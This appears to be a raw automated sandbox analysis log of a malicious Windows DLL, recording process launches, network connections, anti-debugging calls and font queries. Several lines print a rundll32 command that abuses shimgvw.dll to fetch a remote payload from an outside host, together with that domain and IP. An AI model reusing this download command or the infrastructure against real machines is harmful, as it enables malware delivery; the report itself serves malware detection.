Source: rundll32.exe, 00000006.00000002.2940217585.000000000887D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtl
Source: rundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtn
Source: rundll32.exe, 00000006.00000002.2937794002.0000000003058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtr
Source: loaddll32.exe, 00000000.00000002.1751507131.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtsC:
Source: rundll32.exe, 00000006.00000002.2937794002.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtt
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008BA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtv
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtw
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtxt
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008B76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2940012348.0000000008B63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2937723951.0000000002A6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.0000000008876000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.000000000887D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2937725359.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.00000000089BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txtz
Source: rundll32.exe, 00000006.00000002.2940217585.000000000884D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq.txt~
Source: rundll32.exe, 00000005.00000002.2939087416.0000000004B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq/a
Source: rundll32.exe, 00000005.00000002.2939087416.0000000004B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaq/ts/
Source: rundll32.exe, 00000006.00000002.2939550917.00000000050C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaqonts/c
Source: rundll32.exe, 00000005.00000002.2937473872.0000000002577000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2937480440.0000000002C77000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/for2/zetaqtxt
Source: rundll32.exe, 00000008.00000002.2939436401.00000000089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rammenale.com/u
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF95FA0_2_6CDF95FA
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CE03D300_2_6CE03D30
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CE041DB0_2_6CE041DB
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF99590_2_6CDF9959
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CE099190_2_6CE09919
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF92B80_2_6CDF92B8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CDF95FA3_2_6CDF95FA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CE03D303_2_6CE03D30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CE041DB3_2_6CE041DB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CDF99593_2_6CDF9959
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CE099193_2_6CE09919
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CDF92B83_2_6CDF92B8
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6CDF37A0 appears 45 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6CDF37A0 appears 45 times
Source: UiFttnkl2R.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: rundll32.exe, 00000005.00000002.2939087416.0000000004B9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: is a trademark of The Monotype Corporation which may be registered in certain jurisdictions.Inc. All rights reserved.slnt4
Source: classification engineClassification label: mal80.evad.winDLL@14/0@1/1
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF1C39 CoInitialize,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,0_2_6CDF1C39
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: UiFttnkl2R.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\UiFttnkl2R.dll,mydllmain
Source: UiFttnkl2R.dllReversingLabs: Detection: 42%
Source: UiFttnkl2R.dllVirustotal: Detection: 51%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\UiFttnkl2R.dll,mydllmain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txt
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\UiFttnkl2R.dll,mydllmainJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txtJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txtJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/zetaq.txtJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: UiFttnkl2R.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: UiFttnkl2R.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: UiFttnkl2R.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: UiFttnkl2R.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UiFttnkl2R.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: UiFttnkl2R.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: UiFttnkl2R.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: UiFttnkl2R.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UiFttnkl2R.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: UiFttnkl2R.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: UiFttnkl2R.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: UiFttnkl2R.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: UiFttnkl2R.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CE0A031 push ecx; ret 0_2_6CE0A044
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CE0A031 push ecx; ret 3_2_6CE0A044
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exeAPI coverage: 6.9 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 4.6 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7396Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7412Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF15A4 FindFirstFileW,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6CDF15A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CDF15A4 FindFirstFileW,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6CDF15A4
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000Jump to behavior
Source: rundll32.exe, 00000006.00000002.2940217585.0000000008838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU
Source: rundll32.exe, 00000005.00000002.2940012348.0000000008B76000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2940012348.0000000008B50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2940217585.0000000008863000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.00000000089BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2939436401.000000000898D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000002.2940217585.0000000008838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: rundll32.exe, 00000008.00000002.2939436401.000000000898D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP8
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF3621 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDF3621
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CE02BA7 GetProcessHeap,0_2_6CE02BA7
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF3621 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDF3621
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF312C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CDF312C
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDFBADE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDFBADE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CDF3621 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CDF3621
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CDF312C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CDF312C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CDFBADE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CDFBADE

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.153.206.231 443
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UiFttnkl2R.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CDF381B cpuid 0_2_6CDF381B
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
